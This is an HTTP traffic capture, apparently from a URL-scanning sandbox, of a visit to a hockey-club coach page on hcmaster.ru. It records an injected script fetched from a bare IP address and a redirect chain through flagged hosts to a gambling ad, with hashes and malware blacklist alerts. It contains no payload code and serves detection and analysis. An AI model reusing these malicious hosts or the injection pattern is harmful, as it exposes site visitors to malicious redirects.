Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5539
Connection: keep-alive
Last-Modified: Tue, 27 Jun 2017 07:11:32 GMT
Etag: "59520524-15a3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5539
Md5:    9ceb8e42e73da73f66c0ceeb6e8ca058
Sha1:   bf3069ff95e5d47f35076091cdf0eb655dc5b745
Sha256: 8cbcde3fd6196d46287cea492a841c6d1b2f7a0d02a0dce897a395462f8ad0d6
                                        
                                            GET /assets/cache_image/source/news/1W0A2422_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 6899
Connection: keep-alive
Last-Modified: Thu, 06 Jul 2017 11:25:03 GMT
Etag: "595e1e0f-1af3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   6899
Md5:    b2454ef4ddda278b0711e44be77c02ed
Sha1:   e6a1f07a3cf85a7fba1f82ce71156a598899113c
Sha256: 827f830ac45a172409e9e6eb0e3b4391a778eb9fb5ea6ae1a743e315f8f27015
                                        
                                            GET /assets/cache_image/source/news/3_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 3209
Connection: keep-alive
Last-Modified: Wed, 21 Jun 2017 14:29:58 GMT
Etag: "594a82e6-c89"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   3209
Md5:    4aeef2fc3b9dfb9b9822b16b996e29ca
Sha1:   eca8aeb298d068aff26e06b9ca6d3d75deae33a7
Sha256: a4eacb9f7d4d6252f074e2478adea4967cc17c0b7b930469a5ea48bd2f2ae058
                                        
                                            GET /assets/cache_image/source/news/2_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5393
Connection: keep-alive
Last-Modified: Mon, 19 Jun 2017 07:27:12 GMT
Etag: "59477cd0-1511"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5393
Md5:    91c363a815e62ddf263d18ceef3a1ae8
Sha1:   1ae147f207d03e3daf053a1c471b0b409614d613
Sha256: 309911aa165b993c9468ff1d7fc65deaa6b6b4c58f2ec2b38ae51e9ffcd1f2f2
                                        
                                            GET /assets/cache_image/source/news/1W0A7021_835x546_451.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 150428
Connection: keep-alive
Last-Modified: Fri, 13 Oct 2017 15:24:12 GMT
Etag: "59e0da9c-24b9c"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   150428
Md5:    97804f504318b15e38b3c8906cfd2040
Sha1:   4f547e7628287e45d81ffcd6a8f2b587d84d3362
Sha256: f15f3a1d7ac4f9998e1373899b984c47d62e3d43ed5ed50747a5240e8ba46366
                                        
                                            GET /assets/template/image/image/fav1.ico HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 1150
Connection: keep-alive
Last-Modified: Tue, 29 Nov 2016 21:13:52 GMT
Etag: "583def90-47e"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1150
Md5:    f8a042598f0dd3bd6151fa77103dc56e
Sha1:   346efe07e2cab8c9cd58b8d668483d41f4611fea
Sha256: 044e42fd139f3c41d91f05de58f23715fe0df7e25e35c7a998ac9c8e5aba9ba2

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   381
Md5:    e7dbb6ebf669a87d671c5c9ed34fe3a0
Sha1:   e07db8975bcf73a303a90a98de03e33d8a9a0a38
Sha256: f5d48c27ea25a908e67791dd5d0206e5bd3e3b402b2186fc79281cb61b5dca60
                                        
                                            GET /css?family=Roboto:400,100,100italic,300,300italic,400italic,500,500italic,700,700italic,900,900italic&subset=latin,cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   404
Md5:    cd0c1d46dae1ebeca01491a4a144fb71
Sha1:   4a05780c1a62d0cbf5cc514ae17e8bed10adf81c
Sha256: 37986b592bacbbec79e2375a5b9ae4f83e779809d75b3a75f3415d4b50baa42c
                                        
                                            GET /css?family=Roboto+Condensed:400,300,300italic,400italic,700&subset=latin,cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   320
Md5:    3e067abf55c10f26f712c4eb98e80e23
Sha1:   c8a6b56c5f10bcb3f5e837f80066964a47fca35a
Sha256: 402d6e74586ed6d9aebe6dde6790de550e4b91356087218da34c15de814c8d2a
                                        
                                            GET /source/mainBanner/11111111.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 472405
Connection: keep-alive
Last-Modified: Tue, 13 Sep 2016 22:39:38 GMT
Etag: "57d8802a-73555"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   472405
Md5:    18ebed31cce34f6190c95f2a96a537e3
Sha1:   370f58007f895f852dba1cbd4405807757f160b4
Sha256: f1d6b2b2776b5b0bb9bdc6a3ece8206f1c45ce842c231880cbcf28ab5b462e4c
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Thu, 07 Feb 2019 21:20:08 GMT
Etag: "11c1-58154682ae354"
Accept-Ranges: bytes
Content-Length: 4545
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   4545
Md5:    d17c10f0297ea2a06e59f222f5ff0d2c
Sha1:   078fd626626045072bc27cac292090d16095ba90
Sha256: a3eb27a47f44d87b1487fc4b5de8e929d17a44dcc37a9b62650e5d5f3a3eff01

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: __cfuid=1; expires=Wed, 13-Feb-2019 05:49:18 GMT; Max-Age=172800
Content-Length: 705
Connection: close


--- Additional Info ---
Magic:  HTML document text
Size:   705
Md5:    aca94966940ad322f2b794f040772822
Sha1:   8260c40fc2907b0eadd3caee31ca16dd9a269e5e
Sha256: 1bfba15c5ddf08da9f0dafbe7569f7c31a3904e07cda9da1bfb25777f154a9f3

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfuid=1

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Mon, 11 Dec 2017 09:00:56 GMT
Etag: "1536-5600cc5aee200"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 16x16, 256-colors
Size:   5430
Md5:    f3418a443e7d841097c714d69ec4bcb8
Sha1:   49263695f6b0cdd72f45cf1b775e660fdc36c606
Sha256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "50C945FB84E992C967B04E8CEA145A8BC184329A06FA457E05E84746F6B1F206"
Last-Modified: Fri, 08 Feb 2019 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4795
Expires: Mon, 11 Feb 2019 07:09:14 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    4d82e31e88ebecd8608543ea34072547
Sha1:   773142e86d6180c9ad6b226a4185e3c2385cec73
Sha256: 50c945fb84e992c967b04e8cea145a8bc184329a06fa457e05e84746f6b1f206
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.121
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Thu, 07 Feb 2019 23:55:28 GMT
Etag: "51ffedd62653676c120a8c4d143b0fbf59c8409b"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=22366
Expires: Mon, 11 Feb 2019 12:02:05 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    745f16ad26febf7092c2ff8f53a4327b
Sha1:   51ffedd62653676c120a8c4d143b0fbf59c8409b
Sha256: b9b9e714c2ced9f51a984f64ca55297e130fe38353ad449207659377d6cbe837
                                        
                                            GET /ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://185.143.221.14/?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14857833; expires=Tue, 12 Feb 2019 05:49:19 GMT ain=eyJhbGciOiJIUzI1NiJ9.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.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; expires=Mon, 11 Feb 2019 05:50:19 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1252
Md5:    05f3726e80a796fec4aa639ae311f5d1
Sha1:   e1f5b77789584a5b8e4e6dae4807ae58bf44b7aa
Sha256: 0e2c9ad78a98b23670fcca35592b09646f6bf6691fe727e48faf4da8e278ede2

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "3B400D8A7A220E3A7AD7562F265B1B184A9B42CD5D87CAD11C6D35CE09E2BC53"
Last-Modified: Sat, 09 Feb 2019 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=29765
Expires: Mon, 11 Feb 2019 14:05:24 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    2135a8c4e4bbab6cd296efa15a025d38
Sha1:   1abd34998ed30f8a9e5a51e7fd17438bf41826a4
Sha256: 3b400d8a7a220e3a7ad7562f265b1b184a9b42cd5d87cad11c6d35ce09e2bc53
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /stats HTTP/1.1 
Host: r.remarketingpixel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Origin: https://sd5doozry8.com

                                         
                                         23.111.224.2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Content-Length: 40
Connection: keep-alive
Access-Control-Allow-Origin: https://sd5doozry8.com
Access-Control-Allow-Credentials: true
Set-Cookie: uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; expires=Thu, 08 Feb 2029 05:49:19 GMT; domain=.remarketingpixel.com
Expires: Mon, 11 Feb 2019 05:49:19 GMT
Cache-Control: max-age=0, : no-cache


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   40
Md5:    14ed48c42fffba1fbdb3f47ee44991c4
Sha1:   e15abab7db77baafacbe2079ebbe83cd4a58d309
Sha256: f9e35394bfda52babd08b1cc37fb4a6c405b43beb2cd64eee7ec225d464f00ca
                                        
                                            GET /ykwnsxwz29?shu=88a5e0f3b4401f8c8e5ed104d13df1b0b591addb491339a85c9da2b6155a5403e7ebc1af522db5f83d3985b5efe39d1dc159962c981e91581af414f239a0fbc122588bb5e1834528d5&pst=1549864219&rmtc=t&uuid=36897205-e8c5-41ed-84d3-ab468cac02d8%3A2%3A1&pii=&in=false&refer=http%3A%2F%2F185.143.221.14%2F%3Fkey%3DjELb8ThlZZ0lGKvjzQy021gUsAZQSACs&key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t

                                         
                                         198.134.112.242
HTTP/1.1 302 Found
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:20 GMT
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://adserving.unibet.com/redirect.aspx?bid=29694&pid=15135578&sref=ADST&ADST=14857833
Set-Cookie: uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; expires=Mon, 18 Feb 2019 05:49:20 GMT iprcd408e2a3c6b8c96cc5f26c58246a15d0=1469848; expires=Mon, 11 Feb 2019 06:49:20 GMT pdhtkv=true; expires=Tue, 12 Feb 2019 05:49:20 GMT uncs=1; expires=Tue, 12 Feb 2019 05:49:20 GMT pdhtkv28=true; expires=Tue, 12 Feb 2019 05:49:20 GMT uncs28=1; expires=Tue, 12 Feb 2019 05:49:20 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t; uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; iprcd408e2a3c6b8c96cc5f26c58246a15d0=1469848; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:22 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /redirect.aspx?bid=29694&pid=15135578&sref=ADST&ADST=14857833 HTTP/1.1 
Host: adserving.unibet.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /link.php?ver=2 HTTP/1.1 
Host: www.learningtoolkit.club
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Origin: http://hcmaster.ru

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware